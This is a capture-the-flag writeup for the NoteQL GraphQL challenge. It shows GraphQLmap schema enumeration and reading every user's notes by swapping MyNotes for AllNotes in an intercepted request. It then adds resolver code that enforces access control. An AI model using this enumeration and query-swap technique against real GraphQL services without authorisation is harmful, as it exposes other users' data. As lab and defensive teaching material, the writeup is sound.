---
title: "Hack The Box Business CTF 2021: NoteQL"
pubDatetime: 2021-07-25T19:21:11.000Z
tags: ["hackthebox", "writeup"]
description: "Writeup of the web challenge called NoteQL from HackTheBox Business CTF 2021"
---
# Challenge Info

I don't think that replacing your REST APIs means that you don't need access controls. Can you read the admin's tasks from this minimal note taking application?

# Solution

The title of this challenge pretty much tells us straight away that we're dealing with GraphQL.

Visiting the website:

![](/images/2021/07/image-42.png)

I used a tool called `GraphQLmap` to get a better understanding of the GraphQL schema we're dealing with.

```bash
┌─[s1gh@fsociety]─[~/Documents/HackTheBox/HTB-Business-CTF-2021/Web/NoteQL/GraphQLmap]
└──╼ $ python3 graphqlmap.py -u http://165.227.225.92:32634/graphql
   _____                 _      ____  _                            
  / ____|               | |    / __ \| |                           
 | |  __ _ __ __ _ _ __ | |__ | |  | | |     _ __ ___   __ _ _ __  
 | | |_ | '__/ _` | '_ \| '_ \| |  | | |    | '_ ` _ \ / _` | '_ \ 
 | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
  \_____|_|  \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/ 
                  | |                                       | |    
                  |_|                                       |_|    
                              Author: @pentest_swissky Version: 1.0 
GraphQLmap > dump_new
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)

Query
        AllNotes[Post]: 
        Note[]: id (ID!), 
        MyNotes[Post]: 
        NotesFrom[Post]: author (String!), 
Post
        id[]: 
        title[]: 
        author[]: 
        completed[]: 
Mutation
        createNote[]: title (String!), 
        updateNote[]: id (ID!), title (String!), author (String!), 
        completeNote[]: id (ID!), 
        deleteNote[]: id (ID!), 
__Schema
__Type
__Field
__InputValue
__EnumValue
__Directive
GraphQLmap >

```

The schema dump shows a query called `AllNotes` sitting next to `MyNotes`. It takes no arguments and returns `Post` objects, which is quite interesting.

After adding a note and clicking on the recently added note (and sending the request through Burp):

![](/images/2021/07/image-44.png)

I changed `MyNotes` to `AllNotes` in the request in order to dump every note that's stored in this application.

![](/images/2021/07/image-45.png)

And here we find the flag!

Flag: `HTB{n0b0dy_c0ntr0ls_m3!!}`
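The missing access control behind this result, sketched as an added example (not the challenge's source code and not part of the original writeup): resolvers for the four queries from the schema dump, first without and then with a per-caller check. The note store, the users and roles, `ForbiddenError`, `requireUser` and `canRead` are assumptions made for the illustration.

```javascript
// Added illustration; the note store, users and roles are constructed assumptions.
const notes = [
  { id: "1", title: "admin task", author: "admin", completed: false },
  { id: "2", title: "buy milk", author: "alice", completed: false },
  { id: "3", title: "ship release", author: "alice", completed: true },
];

// Vulnerable shape (assumed): only MyNotes looks at the caller; the other queries do not.
const vulnerableResolvers = {
  MyNotes: (_p, _a, ctx) => notes.filter((n) => n.author === ctx.user.name),
  AllNotes: () => notes, // any caller receives every user's notes
  NotesFrom: (_p, args) => notes.filter((n) => n.author === args.author),
  Note: (_p, args) => notes.find((n) => n.id === args.id) || null,
};

class ForbiddenError extends Error {}

// Reject requests that carry no authenticated user in the context.
function requireUser(ctx) {
  if (!ctx || !ctx.user) throw new ForbiddenError("authentication required");
  return ctx.user;
}

// Single policy: admins read everything, other users read only their own notes.
function canRead(user, note) {
  return user.role === "admin" || note.author === user.name;
}

// Hardened shape: every resolver returning a Post applies the same policy.
const hardenedResolvers = {
  MyNotes: (_p, _a, ctx) => {
    const user = requireUser(ctx);
    return notes.filter((n) => n.author === user.name);
  },
  AllNotes: (_p, _a, ctx) => {
    const user = requireUser(ctx);
    if (user.role !== "admin") throw new ForbiddenError("AllNotes is admin-only");
    return notes;
  },
  NotesFrom: (_p, args, ctx) => {
    const user = requireUser(ctx);
    return notes.filter((n) => n.author === args.author && canRead(user, n));
  },
  Note: (_p, args, ctx) => {
    const user = requireUser(ctx);
    const note = notes.find((n) => n.id === args.id);
    return note && canRead(user, note) ? note : null; // same answer for missing and forbidden
  },
};
```

The check lives in the resolvers rather than in the client or in the choice of query name, so swapping `MyNotes` for `AllNotes` in a request no longer changes what a regular user can read.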